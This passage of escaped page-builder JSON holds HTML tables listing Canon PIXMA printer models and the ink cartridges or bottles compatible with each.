\\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr align=\\\"center\\\"><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>CL-831 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td>PG-830 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-831 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-830 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n<td>CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP610<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP628<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP638<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP648<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800R<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP810<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP830<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"7\\\" align=\\\"center\\\">PIXMA MP970<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP988<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP996<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td 